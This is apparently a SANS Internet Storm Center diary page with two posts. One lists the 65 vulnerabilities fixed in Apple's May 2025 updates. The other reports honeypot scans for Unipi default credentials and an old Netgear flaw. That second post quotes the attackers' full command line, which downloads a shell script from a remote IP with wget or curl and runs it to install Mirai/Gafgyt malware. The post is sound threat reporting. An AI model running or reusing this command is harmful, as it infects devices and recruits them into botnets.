Apple Updates Everything: May 2025 Edition

    Published: 2025-05-12. Last Updated: 2025-05-12 20:30:06 UTC
    by Johannes Ullrich (Version: 1)
    0 comment(s)

    Apple released its expected update for all its operating systems. The update, in addition to providing new features, patches 65 different vulnerabilities. Many of these vulnerabilities affect multiple operating systems within the Apple ecosystem.

    Of note is CVE-2025-31200. This vulnerability is already exploited in "targeted attacks". Apple released patches for this vulnerability in mid-April for its current operating Systems (iOS 18, macOS 15, tvOS 18, and visionOS 2). This update includes patches for older versions of macOS and iPadOS/iOS.

     

    iOS 18.5 and iPadOS 18.5 iPadOS 17.7.7 macOS Sequoia 15.5 macOS Sonoma 14.7.6 macOS Ventura 13.7.6 watchOS 11.5 tvOS 18.5 visionOS 2.5
    CVE-2025-24097: An app may be able to read arbitrary file metadata.
    Affects AirDrop
      x            
    CVE-2025-24111: An app may be able to cause unexpected system termination.
    Affects Display
      x            
    CVE-2025-24142: An app may be able to access sensitive user data.
    Affects Notification Center
        x x x      
    CVE-2025-24144: An app may be able to leak sensitive kernel state.
    Affects Kernel
      x   x x      
    CVE-2025-24155: An app may be able to disclose kernel memory.
    Affects WebContentFilter
          x x      
    CVE-2025-24213: A type confusion issue could lead to memory corruption.
    Affects WebKit
    x x x     x x x
    CVE-2025-24220: An app may be able to read a persistent device identifier.
    Affects Sandbox Profiles
      x            
    CVE-2025-24222: Processing maliciously crafted web content may lead to an unexpected process crash.
    Affects BOM
        x          
    CVE-2025-24223: Processing maliciously crafted web content may lead to memory corruption.
    Affects WebKit
        x          
    CVE-2025-24225: Processing an email may lead to user interface spoofing.
    Affects Mail Addressing
    x x            
    CVE-2025-24258: An app may be able to gain root privileges.
    Affects DiskArbitration
          x x      
    CVE-2025-24259: An app may be able to retrieve Safari bookmarks without an entitlement check.
    Affects Parental Controls
      x            
    CVE-2025-24274: A malicious app may be able to gain root privileges.
    Affects Mobile Device Service
        x x x      
    CVE-2025-30440: An app may be able to bypass ASLR.
    Affects Libinfo
        x x x      
    CVE-2025-30442: An app may be able to gain elevated privileges.
    Affects SoftwareUpdate
          x x      
    CVE-2025-30443: An app may be able to access user-sensitive data.
    Affects Found in Apps
        x          
    CVE-2025-30448: An attacker may be able to turn on sharing of an iCloud folder without authentication.
    Affects iCloud Document Sharing
    x x   x x     x
    CVE-2025-30453: A malicious app may be able to gain root privileges.
    Affects DiskArbitration
          x x      
    CVE-2025-31196: Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents.
    Affects CoreGraphics
      x   x x      
    CVE-2025-31200: Processing an audio stream in a maliciously crafted media file may result in code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS released before iOS 18.4.1..
    Affects CoreAudio
              x    
    CVE-2025-31204: Processing maliciously crafted web content may lead to memory corruption.
    Affects WebKit
    x         x x x
    CVE-2025-31205: A malicious website may exfiltrate data cross-origin.
    Affects WebKit
    x   x     x x x
    CVE-2025-31206: Processing maliciously crafted web content may lead to an unexpected Safari crash.
    Affects WebKit
    x x x     x x x
    CVE-2025-31207: An app may be able to enumerate a user's installed apps.
    Affects FrontBoard
    x              
    CVE-2025-31208: Parsing a file may lead to an unexpected app termination.
    Affects CoreAudio
    x x x x x x x x
    CVE-2025-31209: Parsing a file may lead to disclosure of user information.
    Affects CoreGraphics
    x x x x x x x x
    CVE-2025-31210: Processing web content may lead to a denial-of-service.
    Affects FaceTime
    x x            
    CVE-2025-31212: An app may be able to access sensitive user data.
    Affects Core Bluetooth
    x   x     x x x
    CVE-2025-31213: An app may be able to access associated usernames and websites in a user's iCloud Keychain.
    Affects Security
      x x x x      
    CVE-2025-31214: An attacker in a privileged network position may be able to intercept network traffic.
    Affects Baseband
    x              
    CVE-2025-31215: Processing maliciously crafted web content may lead to an unexpected process crash.
    Affects WebKit
    x x x     x x x
    CVE-2025-31217: Processing maliciously crafted web content may lead to an unexpected Safari crash.
    Affects WebKit
    x x x     x x x
    CVE-2025-31218: An app may be able to observe the hostnames of new network connections.
    Affects NetworkExtension
        x          
    CVE-2025-31219: An attacker may be able to cause unexpected system termination or corrupt kernel memory.
    Affects Kernel
    x x x x x x x x
    CVE-2025-31220: A malicious app may be able to read sensitive location information.
    Affects Weather
      x x x x      
    CVE-2025-31221: A remote attacker may be able to leak memory.
    Affects Security
    x x x x x x x x
    CVE-2025-31222: A user may be able to elevate privileges.
    Affects mDNSResponder
    x   x x x x x x
    CVE-2025-31224: An app may be able to bypass certain Privacy preferences.
    Affects Sandbox
        x x x      
    CVE-2025-31225: Call history from deleted apps may still appear in spotlight search results.
    Affects Call History
    x              
    CVE-2025-31226: Processing a maliciously crafted image may lead to a denial-of-service.
    Affects ImageIO
    x x x     x x x
    CVE-2025-31227: An attacker with physical access to a device may be able to access a deleted call recording.
    Affects Notes
    x              
    CVE-2025-31228: An attacker with physical access to a device may be able to access notes from the lock screen.
    Affects Notes
    x x            
    CVE-2025-31232: A sandboxed app may be able to access sensitive user data.
    Affects Installer
        x x x      
    CVE-2025-31233: Processing a maliciously crafted video file may lead to unexpected app termination or corrupt process memory.
    Affects CoreMedia
    x x x x x x x x
    CVE-2025-31234: An attacker may be able to cause unexpected system termination or corrupt kernel memory.
    Affects Pro Res
    x   x       x x
    CVE-2025-31235: An app may be able to cause unexpected system termination.
    Affects Audio
      x x x x      
    CVE-2025-31236: An app may be able to access sensitive user data.
    Affects Finder
        x          
    CVE-2025-31237: Mounting a maliciously crafted AFP network share may lead to system termination.
    Affects afpfs
        x x x      
    CVE-2025-31238: Processing maliciously crafted web content may lead to memory corruption.
    Affects WebKit
    x   x     x x x
    CVE-2025-31239: Parsing a file may lead to an unexpected app termination.
    Affects CoreMedia
    x x x x x x x x
    CVE-2025-31241: A remote attacker may cause an unexpected app termination.
    Affects Kernel
    x x x x x x x x
    CVE-2025-31242: An app may be able to access sensitive user data.
    Affects StoreKit
      x x x x      
    CVE-2025-31244: An app may be able to break out of its sandbox.
    Affects quarantine
        x          
    CVE-2025-31245: An app may be able to cause unexpected system termination.
    Affects Pro Res
    x x x x x   x x
    CVE-2025-31246: Connecting to a malicious AFP server may corrupt kernel memory.
    Affects afpfs
        x x        
    CVE-2025-31247: An attacker may gain access to protected parts of the file system.
    Affects SharedFileList
        x x x      
    CVE-2025-31249: An app may be able to access sensitive user data.
    Affects Sandbox
        x          
    CVE-2025-31250: An app may be able to access sensitive user data.
    Affects TCC
        x          
    CVE-2025-31251: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory.
    Affects AppleJPEG
    x x x x x x x x
    CVE-2025-31253: Muting the microphone during a FaceTime call may not result in audio being silenced.
    Affects FaceTime
    x              
    CVE-2025-31256: Hot corner may unexpectedly reveal a user?s deleted notes.
    Affects Notes
        x          
    CVE-2025-31257: Processing maliciously crafted web content may lead to an unexpected Safari crash.
    Affects WebKit
    x   x     x x x
    CVE-2025-31258: An app may be able to break out of its sandbox.
    Affects RemoteViewServices
        x          
    CVE-2025-31259: An app may be able to gain elevated privileges.
    Affects SoftwareUpdate
        x          
    CVE-2025-31260: An app may be able to access sensitive user data.
    Affects Apple Intelligence Reports
        x          

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
    Twitter|

    Keywords: apple ios macos patches
    0 comment(s)

    It Is 2025, And We Are Still Dealing With Default IoT Passwords And Stupid 2013 Router Vulnerabilities

    Published: 2025-05-12. Last Updated: 2025-05-12 13:49:21 UTC
    by Johannes Ullrich (Version: 1)
    0 comment(s)

    Unipi Technologies is a company developing programmable logic controllers for a number of different applications like home automation, building management, and industrial controls. The modules produced by Unipi are likely to appeal to a more professional audience. All modules are based on the "Marvis" platform, a customized Linux distribution maintained by Unipi.

    In the last couple of days, we did observe scans for the unipi default username and password ("unipi" and "unipi.technology")  in our honeypot logs. The scans originate from 176.65.148.10, an IP address that is well-known to our database.

    In addition to SSH, the IP address also scans for an ancient Netgear vulnerability from 2013, which only got a CVE number last year (CVE-2024-12847). 

    Both, the SSH as well as the "Netgear" exploit attempts are executing the same commands:

    cd /tmp; rm -rf wget.sh curl.sh; wget http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh;curl -o http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh

    which kicks off the standard Mirai/Gafgyt install chain.

     

     

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
    Twitter|

    0 comment(s)
    ISC Stormcast For Monday, May 12th, 2025 https://isc.sans.edu/podcastdetail/9446

      Comments


      Diary Archives